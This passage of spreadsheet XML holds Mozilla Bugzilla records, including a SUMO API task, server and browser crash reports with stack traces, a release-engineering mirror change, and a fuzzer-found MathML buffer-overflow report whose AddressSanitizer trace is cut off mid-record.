and according to lxr it was due to bug 98123.</t>
        </is>
      </c>
      <c r="X1158" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" t="n">
        <v>1062407</v>
      </c>
      <c r="B1159" t="inlineStr">
        <is>
          <t>2014-09-03 09:57:32 -0700</t>
        </is>
      </c>
      <c r="C1159" t="inlineStr">
        <is>
          <t>[buddyup] Create read/write questions API.</t>
        </is>
      </c>
      <c r="D1159" t="inlineStr">
        <is>
          <t>2018-11-29 23:37:06 -0800</t>
        </is>
      </c>
      <c r="E1159" t="n">
        <v>1</v>
      </c>
      <c r="F1159" t="n">
        <v>1</v>
      </c>
      <c r="G1159" t="n">
        <v>5</v>
      </c>
      <c r="H1159" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1159" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1159" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1159" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1159" t="inlineStr">
        <is>
          <t>u=api c=questions p=3 s=2014.17</t>
        </is>
      </c>
      <c r="Q1159" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1159" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1159" t="inlineStr">
        <is>
          <t>2014Q4</t>
        </is>
      </c>
      <c r="T1159" t="n">
        <v>1</v>
      </c>
      <c r="U1159" t="n">
        <v>0</v>
      </c>
      <c r="V1159" t="n">
        <v>7</v>
      </c>
      <c r="W1159" t="inlineStr">
        <is>
          <t>This bug covers making basic API CRUD views for the Question and Answer models. These APIs should work with the authentication from bug 1062401. Additionally, this bug covers tests for the above, and writing the APIs in a way that will be future expansion easier.
I'm putting this in the next sprint for now, because I don't think I'll get to it this sprint, but if I finish the authorization bug sooner, I'll work on this next.</t>
        </is>
      </c>
      <c r="X1159" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" t="n">
        <v>615924</v>
      </c>
      <c r="B1160" t="inlineStr">
        <is>
          <t>2010-12-01 10:43:53 -0800</t>
        </is>
      </c>
      <c r="C1160" t="inlineStr">
        <is>
          <t>Fix update_question_vote task and cron</t>
        </is>
      </c>
      <c r="D1160" t="inlineStr">
        <is>
          <t>2011-01-11 09:29:53 -0800</t>
        </is>
      </c>
      <c r="E1160" t="n">
        <v>1</v>
      </c>
      <c r="F1160" t="n">
        <v>1</v>
      </c>
      <c r="G1160" t="n">
        <v>5</v>
      </c>
      <c r="H1160" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1160" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1160" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1160" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1160" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1160" t="inlineStr"/>
      <c r="Q1160" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1160" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1160" t="inlineStr">
        <is>
          <t>2.4.1</t>
        </is>
      </c>
      <c r="T1160" t="n">
        <v>1</v>
      </c>
      <c r="U1160" t="n">
        <v>0</v>
      </c>
      <c r="V1160" t="n">
        <v>4</v>
      </c>
      <c r="W1160" t="inlineStr">
        <is>
          <t>The update_question_vote task can generate a stack trace (see below). I'm not sure how serious that is.
The cron to update weekly vote counts should be broken up into chunks like rebuild_kb and run in parallel.
======
[2010-12-01 10:39:09,389: ERROR/MainProcess] Task questions.tasks.update_question_votes[9df6d6e5-75e1-466c-b73e-01e85b9838b8] raised exception: IntegrityError(1062, "Duplicate entry '765036' for key 1")
Traceback (most recent call last):
  File "/data/www/master.support.mozilla.com/kitsune/vendor/packages/celery/celery/execute/trace.py", line 29, in trace
    return cls(states.SUCCESS, retval=fun(*args, **kwargs))
  File "/data/www/master.support.mozilla.com/kitsune/vendor/packages/celery/celery/task/base.py", line 222, in __call__
    return self.run(*args, **kwargs)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/packages/celery/celery/decorators.py", line 52, in run
    return fun(*args, **kwargs)
  File "/data/www/master.support.mozilla.com/kitsune/apps/questions/tasks.py", line 26, in update_question_votes
    q.save(no_update=True)
  File "/data/www/master.support.mozilla.com/kitsune/apps/questions/models.py", line 88, in save
    super(Question, self).save(*args, **kwargs)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/base.py", line 434, in save
    self.save_base(using=using, force_insert=force_insert, force_update=force_update)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/base.py", line 527, in save_base
    result = manager._insert(values, return_id=update_pk, using=using)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/manager.py", line 195, in _insert
    return insert_query(self.model, values, **kwargs)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/query.py", line 1479, in insert_query
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 783, in execute_sql
    cursor = super(SQLInsertCompiler, self).execute_sql(None)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 727, in execute_sql
    cursor.execute(sql, params)
  File "/data/www/master.support.mozilla.com/kitsune/vendor/src/django/django/db/backends/mysql/base.py", line 86, in execute
    return self.cursor.execute(query, args)
  File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 173, in execute
    self.errorhandler(self, exc, value)
  File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler
    raise errorclass, errorvalue
IntegrityError: (1062, "Duplicate entry '765036' for key 1")</t>
        </is>
      </c>
      <c r="X1160" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" t="n">
        <v>1068584</v>
      </c>
      <c r="B1161" t="inlineStr">
        <is>
          <t>2014-09-17 05:14:14 -0700</t>
        </is>
      </c>
      <c r="C1161" t="inlineStr">
        <is>
          <t>Disable Flame OTA until bug 1068539 lands</t>
        </is>
      </c>
      <c r="D1161" t="inlineStr">
        <is>
          <t>2014-09-18 04:21:01 -0700</t>
        </is>
      </c>
      <c r="E1161" t="n">
        <v>1</v>
      </c>
      <c r="F1161" t="n">
        <v>1</v>
      </c>
      <c r="G1161" t="n">
        <v>5</v>
      </c>
      <c r="H1161" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1161" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1161" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1161" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1161" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1161" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1161" t="inlineStr"/>
      <c r="Q1161" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1161" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1161" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1161" t="n">
        <v>1</v>
      </c>
      <c r="U1161" t="n">
        <v>0</v>
      </c>
      <c r="V1161" t="n">
        <v>8</v>
      </c>
      <c r="W1161" t="inlineStr">
        <is>
          <t>Bug 1068539 describes the issue: a js type change will make IndexedDB to explode on boot.</t>
        </is>
      </c>
      <c r="X1161" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" t="n">
        <v>92647</v>
      </c>
      <c r="B1162" t="inlineStr">
        <is>
          <t>2001-07-27 14:51:24 -0700</t>
        </is>
      </c>
      <c r="C1162" t="inlineStr">
        <is>
          <t>TechCU online bank login layout problems and potential crash</t>
        </is>
      </c>
      <c r="D1162" t="inlineStr">
        <is>
          <t>2009-02-10 22:15:41 -0800</t>
        </is>
      </c>
      <c r="E1162" t="n">
        <v>1</v>
      </c>
      <c r="F1162" t="n">
        <v>1</v>
      </c>
      <c r="G1162" t="n">
        <v>3</v>
      </c>
      <c r="H1162" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1162" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1162" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K1162" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1162" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1162" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1162" t="inlineStr"/>
      <c r="Q1162" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1162" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1162" t="inlineStr">
        <is>
          <t>mozilla0.9.4</t>
        </is>
      </c>
      <c r="T1162" t="n">
        <v>1</v>
      </c>
      <c r="U1162" t="n">
        <v>0</v>
      </c>
      <c r="V1162" t="n">
        <v>33</v>
      </c>
      <c r="W1162" t="inlineStr">
        <is>
          <t>I have seen this with the NS6.1 candidate on Win2k and Mozilla trunk build on Linux.
To reproduce:
1. Go to URL
2. Type some numbers to the Member Number box.
Expected Results: nothing special
Actual Results: For each keypress, the SIGN ON button moves to the right, the
Member Number and PIN fields moving as well. This moving happens for each
keypress until the SIGN ON button reaches the right end of the page.
This is a regression (probably last week or earlier but not sure), this did not
happen with NS6.1b1.
I can actually get a crash out of this (might be different bug, or caused by
this funky moved layout): save the frame where the form is to local disc (you
can even remove the JS in the file, the moving and crashing still occurs), load
it, type some text, switch to another window (get ASSERTION:  Attempt to
decrement focus controller's suppression when no suppresion active!: 'PR_FALSE'
in nsFocusController.cpp#415), click ignore, reaload page -&gt; crash.
Stack trace:
NTDLL! 77fa018c()
nsDebug::Assertion(const char * 0x026e37e4 `string', const char * 0x026e3828
`string', const char * 0x026e3838 `string', int 649) line 290 + 13 bytes
nsDebug::PreCondition(const char * 0x026e37e4 `string', const char * 0x026e3828
`string', const char * 0x026e3838 `string', int 649) line 434 + 21 bytes
nsCOMPtr&lt;nsIDOMWindowInternal&gt;::operator-&gt;() line 649 + 34 bytes
nsFocusController::UpdateCommands(nsFocusController * const 0x029d83e0, const
nsAString &amp; {...}) line 135 + 12 bytes
nsFocusController::SetSuppressFocus(nsFocusController * const 0x029d83e0, int 0,
char * 0x02666414) line 420 + 29 bytes
nsDocShell::SetupNewViewer(nsDocShell * const 0x03c58270, nsIContentViewer *
0x04075d30) line 4123
nsWebShell::SetupNewViewer(nsWebShell * const 0x03c58270, nsIContentViewer *
0x04075d30) line 301 + 13 bytes
nsDocShell::Embed(nsDocShell * const 0x03c58294, nsIContentViewer * 0x04075d30,
const char * 0x0266bcb0, nsISupports * 0x00000000) line 3576 + 23 bytes
nsWebShell::Embed(nsWebShell * const 0x03c58294, nsIContentViewer * 0x04075d30,
const char * 0x0266bcb0, nsISupports * 0x00000000) line 326
nsDocShell::CreateContentViewer(nsDocShell * const 0x03c58270, const char *
0x0012fa7c, nsIRequest * 0x0404a420, nsIStreamListener * * 0x0012facc) line 3870
+ 32 bytes
nsDSURIContentListener::DoContent(nsDSURIContentListener * const 0x03c58180,
const char * 0x0012fa7c, int 3, nsIRequest * 0x0404a420, nsIStreamListener * *
0x0012facc, int * 0x0012fa60) line 120 + 33 bytes
nsDocumentOpenInfo::DispatchContent(nsIRequest * 0x0404a420, nsISupports *
0x00000000) line 343 + 93 bytes
nsDocumentOpenInfo::OnStartRequest(nsDocumentOpenInfo * const 0x0404a330,
nsIRequest * 0x0404a420, nsISupports * 0x00000000) line 217 + 16 bytes
nsFileChannel::OnStartRequest(nsFileChannel * const 0x0404a428, nsIRequest *
0x0404a224, nsISupports * 0x00000000) line 454 + 37 bytes
nsOnStartRequestEvent::HandleEvent() line 109 + 53 bytes
nsARequestObserverEvent::HandlePLEvent(PLEvent * 0x0407bcc4) line 64
PL_HandleEvent(PLEvent * 0x0407bcc4) line 590 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x010d06d0) line 520 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x002307a8, unsigned int 49423, unsigned int 0,
long 17630928) line 1071 + 9 bytes
USER32! 77e12e98()
USER32! 77e130e0()
USER32! 77e15824()
nsAppShellService::Run(nsAppShellService * const 0x0113ccf0) line 425
main1(int 2, char * * 0x00485f90, nsISupports * 0x00000000) line 1290 + 32 bytes
main(int 2, char * * 0x00485f90) line 1599 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e97d08()
I can get other kinds of assertions as well when I use the page online. Same
procedure, but you can get an assertion saying NS_ENSURE_TRUE(NS_SUCCEEDED(rv)
&amp;&amp; window) failed in nsXULCommandDispatcher.cpp#141 (you can also get the above
assertion). After playing for a while the textfiled stopped accepting focus,
then accepted focus but did not accept keypresses, then returned to normal (just
switching to other application and back).</t>
        </is>
      </c>
      <c r="X1162" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" t="n">
        <v>815124</v>
      </c>
      <c r="B1163" t="inlineStr">
        <is>
          <t>2012-11-26 06:42:53 -0800</t>
        </is>
      </c>
      <c r="C1163" t="inlineStr">
        <is>
          <t>Switch buildbot wgets from ftp.mozilla.org to http://ftp-scl3.mozilla.com for bug 811063</t>
        </is>
      </c>
      <c r="D1163" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1163" t="n">
        <v>1</v>
      </c>
      <c r="F1163" t="n">
        <v>1</v>
      </c>
      <c r="G1163" t="n">
        <v>5</v>
      </c>
      <c r="H1163" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1163" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1163" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1163" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1163" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1163" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q1163" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1163" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1163" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1163" t="n">
        <v>1</v>
      </c>
      <c r="U1163" t="n">
        <v>0</v>
      </c>
      <c r="V1163" t="n">
        <v>21</v>
      </c>
      <c r="W1163" t="inlineStr">
        <is>
          <t>(In reply to Peter Radcliffe [:pir] from bug 811063 comment #51)
&gt; I think we have plenty of examples now, thanks.
&gt; 
&gt; The issue is debugging. The nameservers get far too many requests to log
&gt; absolutely everything and it's hard to work out if a handful of requests in
&gt; a few million gets to the nameserver or if there's a network issue, the
&gt; process is not responding or one of a dozen other reasons these requests
&gt; aren't getting responded to.
&gt; 
&gt; We'll need to work through some possibilities. Easiest to test is taking
&gt; dynect out of the path. I've added ftp-scl3.mozilla.com as a direct ip, not
&gt; a CNAME, can you switch these wget downloads to paths under
&gt; http://ftp-scl3.mozilla.com/pub/mozilla.org/ instead of ftp.mozilla.org,
&gt; please?</t>
        </is>
      </c>
      <c r="X1163" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" t="n">
        <v>878101</v>
      </c>
      <c r="B1164" t="inlineStr">
        <is>
          <t>2013-05-31 09:46:52 -0700</t>
        </is>
      </c>
      <c r="C1164" t="inlineStr">
        <is>
          <t>Validate origin in manifest</t>
        </is>
      </c>
      <c r="D1164" t="inlineStr">
        <is>
          <t>2013-11-08 07:57:30 -0800</t>
        </is>
      </c>
      <c r="E1164" t="n">
        <v>1</v>
      </c>
      <c r="F1164" t="n">
        <v>1</v>
      </c>
      <c r="G1164" t="n">
        <v>6</v>
      </c>
      <c r="H1164" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1164" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1164" t="inlineStr">
        <is>
          <t>Validation</t>
        </is>
      </c>
      <c r="K1164" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1164" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1164" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1164" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1164" t="inlineStr"/>
      <c r="Q1164" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1164" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1164" t="inlineStr">
        <is>
          <t>2013-06-27</t>
        </is>
      </c>
      <c r="T1164" t="n">
        <v>1</v>
      </c>
      <c r="U1164" t="n">
        <v>0</v>
      </c>
      <c r="V1164" t="n">
        <v>12</v>
      </c>
      <c r="W1164" t="inlineStr">
        <is>
          <t>In bug 852720 packaged apps were allowed to have an origin in the manifest. This is for the validator to check that the origin is valid.</t>
        </is>
      </c>
      <c r="X1164" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" t="n">
        <v>910881</v>
      </c>
      <c r="B1165" t="inlineStr">
        <is>
          <t>2013-08-29 13:40:44 -0700</t>
        </is>
      </c>
      <c r="C1165" t="inlineStr">
        <is>
          <t>Crash on long pages (neverending reddit with images enabled)</t>
        </is>
      </c>
      <c r="D1165" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:25 -0800</t>
        </is>
      </c>
      <c r="E1165" t="n">
        <v>1</v>
      </c>
      <c r="F1165" t="n">
        <v>1</v>
      </c>
      <c r="G1165" t="n">
        <v>3</v>
      </c>
      <c r="H1165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1165" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1165" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L1165" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1165" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1165" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1165" t="inlineStr">
        <is>
          <t>[adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q1165" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1165" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1165" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1165" t="n">
        <v>1</v>
      </c>
      <c r="U1165" t="n">
        <v>0</v>
      </c>
      <c r="V1165" t="n">
        <v>53</v>
      </c>
      <c r="W1165" t="inlineStr">
        <is>
          <t>1. Install Reddit Enhancement Suite
2. Enable Neverending Reddit
3. Enable Inline Images
4. Click on 'Show Images'
5. Start browsing (17+ pages opened)
6. CRASH
I don't think this is because of Reddit Enhancement Suite but that Firefox simply can't handle a page that gets this long with this amount of images and other content loaded.</t>
        </is>
      </c>
      <c r="X1165" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" t="n">
        <v>963198</v>
      </c>
      <c r="B1166" t="inlineStr">
        <is>
          <t>2014-01-23 10:27:57 -0800</t>
        </is>
      </c>
      <c r="C1166" t="inlineStr">
        <is>
          <t>out of bounds read in libxul.so!gfxContext::Polygon</t>
        </is>
      </c>
      <c r="D1166" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:21 -0700</t>
        </is>
      </c>
      <c r="E1166" t="n">
        <v>1</v>
      </c>
      <c r="F1166" t="n">
        <v>1</v>
      </c>
      <c r="G1166" t="n">
        <v>3</v>
      </c>
      <c r="H1166" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1166" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1166" t="inlineStr">
        <is>
          <t>MathML</t>
        </is>
      </c>
      <c r="K1166" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1166" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1166" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1166" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1166" t="inlineStr">
        <is>
          <t>[adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q1166" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1166" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1166" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1166" t="n">
        <v>1</v>
      </c>
      <c r="U1166" t="n">
        <v>0</v>
      </c>
      <c r="V1166" t="n">
        <v>31</v>
      </c>
      <c r="W1166" t="inlineStr">
        <is>
          <t>Created attachment 8364497
C9881027-223471-mathml.html
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
==7859==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffa141ed10 at pc 0x7fb96506196c bp 0x7fffa141e850 sp 0x7fffa141e848
READ of size 8 at 0x7fffa141ed10 thread T0
    #0 0x7fb96506196b (libxul.so!gfxContext::Polygon(gfxPoint const*, unsigned int)+0x39b)
	Line 66 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/thebes/gfx2DGlue.h"
    #1 0x7fb9684f94a3 (libxul.so!nsDisplayNotation::Paint(nsDisplayListBuilder*, nsRenderingContext*)+0xa43)
	Line 803 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/mathml/nsMathMLmencloseFrame.cpp"
    #2 0x7fb967e481c7 (libxul.so!mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, nsIntRect const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, nsIntPoint const&amp;, float, float, int)+0xe47)
	Line 3487 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/FrameLayerBuilder.cpp"
    #3 0x7fb967e4a4dd (libxul.so!mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*)+0x15fd)
	Line 3649 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/FrameLayerBuilder.cpp"
    #4 0x7fb965118b41 (libxul.so!mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, mozilla::layers::DrawRegionClip, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*)+0x81)
	Line 114 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/layers/basic/BasicThebesLayer.h"
    #5 0x7fb9650fa5aa (libxul.so!mozilla::layers::BasicThebesLayer::Validate(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*)+0x69a)
	Line 208 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/layers/basic/BasicThebesLayer.cpp"
    #6 0x7fb9650ed4bd (libxul.so!non-virtual thunk to mozilla::layers::BasicContainerLayer::Validate(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*)+0x8d)
	Line 124 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/layers/basic/BasicContainerLayer.cpp"
    #7 0x7fb9650ed4bd (libxul.so!non-virtual thunk to mozilla::layers::BasicContainerLayer::Validate(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*)+0x8d)
	Line 124 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/layers/basic/BasicContainerLayer.cpp"
    #8 0x7fb9650f061f (libxul.so!mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags)+0x56f)
	Line 597 of "/builds/slave/m-in-l64-asan-0000000000000000/build/gfx/layers/basic/BasicLayerManager.cpp"
    #9 0x7fb967f256ef (libxul.so!nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const+0x13bf)
	Line 1231 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsDisplayList.cpp"
    #10 0x7fb967f2424a (libxul.so!nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const+0x24a)
	Line 1076 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsDisplayList.cpp"
    #11 0x7fb967f75d95 (libxul.so!nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int)+0x2205)
	Line 2339 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsLayoutUtils.cpp"
    #12 0x7fb967dee741 (libxul.so!PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int)+0xe11)
	Line 5847 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #13 0x7fb966d8e87c (libxul.so!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool)+0x3fc)
	Line 420 of "/builds/slave/m-in-l64-asan-0000000000000000/build/view/src/nsViewManager.cpp"
    #14 0x7fb967e121d0 (libxul.so!nsRefreshDriver::Tick(long, mozilla::TimeStamp)+0x2ba0)
	Line 1207 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #15 0x7fb967e16030 (libxul.so!mozilla::RefreshDriverTimer::Tick()+0x1f0)
	Line 168 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #16 0x7fb963af5d83 (libxul.so!nsTimerImpl::Fire()+0x6b3)
	Line 551 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #17 0x7fb963af64e6 (libxul.so!nsTimerEvent::Run()+0x66)
	Line 635 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #18 0x7fb963aedcf7 (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xbd7)
	Line 637 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #19 0x7fb9639c66d1 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
	Line 263 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #20 0x7fb9642e7a81 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x311)
	Line 95 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #21 0x7fb9642592f3 (libxul.so!MessageLoop::Run()+0x1c3)
